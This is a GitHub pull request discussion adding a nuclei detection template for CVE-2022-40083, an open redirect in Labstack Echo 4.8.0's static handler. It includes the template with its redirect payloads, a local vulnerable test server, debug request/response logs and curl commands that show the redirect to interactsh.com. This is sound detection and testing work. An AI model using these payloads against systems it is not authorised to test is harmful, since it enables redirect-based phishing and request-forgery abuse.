New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added CVE-2022-40083 #5606
Added CVE-2022-40083 #5606
Conversation
@ehsandeep After building this out and testing it I was not able to get nuclei to flag it as an issue. Although I was able to just run the curl command and get it to redirect. //main.go
package main
import (
"github.com/labstack/echo/v4"
)
func main() {
e := echo.New()
e.Static("/", "./")
e.Logger.Fatal(e.Start(":1323"))
} //go.mod
module ssrf/test
go 1.19
require github.com/labstack/echo/v4 v4.8.0
require (
github.com/labstack/echo v3.3.10+incompatible // indirect
github.com/labstack/gommon v0.3.1 // indirect
github.com/mattn/go-colorable v0.1.11 // indirect
github.com/mattn/go-isatty v0.0.14 // indirect
github.com/valyala/bytebufferpool v1.0.0 // indirect
github.com/valyala/fasttemplate v1.2.1 // indirect
golang.org/x/crypto v0.0.0-20210817164053-32db794688a5 // indirect
golang.org/x/net v0.0.0-20211015210444-4f30a5c0130f // indirect
golang.org/x/sys v0.0.0-20211103235746-7861aae1554b // indirect
golang.org/x/text v0.3.7 // indirect
) Nuclei with template only: └──╼ # echo http://127.0.0.1:1323/ | nuclei -v -t ~/nuclei-templates/cves/2022/CVE-2022-40083.yaml -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.8.8
projectdiscovery.io
[INF] Using Nuclei Engine 2.8.8 (latest)
[INF] Using Nuclei Templates 9.3.6 (latest)
[INF] Templates added in last update: 30
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[DBG] failed to parse payload {{BaseURL}}//interactsh.com%2f.. and http://127.0.0.1:1323.skipping param merge
[INF] [CVE-2022-40083] Dumped HTTP request for http://127.0.0.1:1323//interactsh.com%2f..
GET //interactsh.com%252f.. HTTP/1.1
Host: 127.0.0.1:1323
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[WRN] [CVE-2022-40083] Could not execute request for http://127.0.0.1:1323/: GET http://127.0.0.1:1323//interactsh.com%2f.. giving up after 2 attempts: Get "http://127.0.0.1:1323//interactsh.com%252f..": failed to parse Location header "//interactsh.com%2f../": parse "//interactsh.com%2f../": invalid URL escape "%2f"
[INF] No results found. Better luck next time! Curl request: └──╼ # curl -L http://127.0.0.1:1323//interactsh.com%2f..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html> Am I doing something wrong or including the wrong package? Thank you! |
@j1v37u2k3y there is a known bug in nuclei engine which got fixed in PR - projectdiscovery/nuclei#3243, if you try to run nuclei using the above PR, it should be working as expected. |
@ehsandeep Ok So I found some weird behavior with the PR that you suggested. Running two different variations produced different results based on url patterns. But the curl command work on both variations. Template usedid: CVE-2022-40083
info:
name: Labstack Echo 4.8.0 - Open Redirect
author: pdteam
severity: critical
description: |
Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Download and install 4.9.0, which contains a patch for this issue.
reference:
- https://github.com/labstack/echo/issues/2259
- https://nvd.nist.gov/vuln/detail/CVE-2022-40083
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6
cve-id: CVE-2022-40083
cwe-id: CWE-601
tags: cve,cve2022,redirect,labstack
requests:
- method: GET
path:
- "{{RootURL}}/{{redirect}}"
payloads:
redirect:
- '/interactsh.com%2F..'
- '/interactsh.com/%2F..'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interactsh.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
- 301
- 302
- 307
- 308
condition: or results[INF] Using Nuclei Engine 2.8.8 (latest)
[INF] Using Nuclei Templates 9.3.6 (latest)
[INF] Templates added in last update: 30
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[INF] [CVE-2022-40083] Dumped HTTP request for http://localhost:49366//interactsh.com%2F..
GET //interactsh.com%252F.. HTTP/1.1
Host: localhost:49366
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[INF] [CVE-2022-40083] Dumped HTTP request for http://localhost:49366//interactsh.com/%2F..
GET //interactsh.com/%252F.. HTTP/1.1
Host: localhost:49366
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2022-40083] Dumped HTTP response http://localhost:49366//interactsh.com/%2F..
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 31 Jan 2023 22:30:26 GMT
Location: //interactsh.com/%2F../
Content-Length: 0
[CVE-2022-40083:regex-1] [http] [critical] http://localhost:49366//interactsh.com/%252F.. [redirect="/interactsh.com/%2F.."]
[CVE-2022-40083:status-2] [http] [critical] http://localhost:49366//interactsh.com/%252F.. [redirect="/interactsh.com/%2F.."]
[WRN] [CVE-2022-40083] Could not execute request for http://localhost:49366: GET http://localhost:49366//interactsh.com%2F.. giving up after 2 attempts: Get "http://localhost:49366//interactsh.com%252F..": failed to parse Location header "//interactsh.com%2F../": parse "//interactsh.com%2F../": invalid URL escape "%2F" curl commands with each redirect@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $ curl -L http://localhost:49366//interactsh.com%2F..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html>
@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $ curl -L http://localhost:49366//interactsh.com/%2F..
<!DOCTYPE html>
<html>
<body>
<body onload="window.location='https://app.interactsh.com';">
</body>
</html>
@j1v37u2k3y ➜ .../nuclei/v2/cmd/nuclei (issue-3242-make-request-fix) $ |
Template / PR Information
Template Validation
I've validated this template locally?
Additional Details (leave it blank if not applicable)
Additional References: